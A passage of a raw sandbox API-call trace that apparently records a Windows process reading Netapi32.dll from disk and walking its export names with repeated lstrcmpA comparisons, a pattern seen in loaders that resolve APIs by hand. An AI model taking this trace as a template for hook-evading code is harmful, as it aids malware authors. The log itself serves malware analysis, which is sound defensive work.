lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0278.088] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.088] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0278.088] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0278.088] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0278.088] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.088] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0278.088] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0278.088] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0278.089] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0278.090] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0278.091] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0278.091] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0278.091] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.091] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.091] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0278.092] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0278.200] GetProcessHeap () returned 0x470000 [0278.200] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3a3d010 | out: hHeap=0x470000) returned 1 [0278.201] GetProcessHeap () returned 0x470000 [0278.201] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489100 [0278.201] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0278.207] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0278.207] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0278.207] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0278.208] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0278.209] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0278.210] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0278.211] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0278.211] GetProcessHeap () returned 0x470000 [0278.211] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13b00) returned 0x2d05030 [0278.211] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0278.211] ReadFile (in: hFile=0x17c, lpBuffer=0x2d05030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d05030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0278.212] CloseHandle (hObject=0x17c) returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0278.212] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0278.213] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0278.214] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0278.215] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0278.215] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0278.216] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0278.217] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0278.218] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0278.220] lstrcmpA (lpString1="NetAccessEnum", 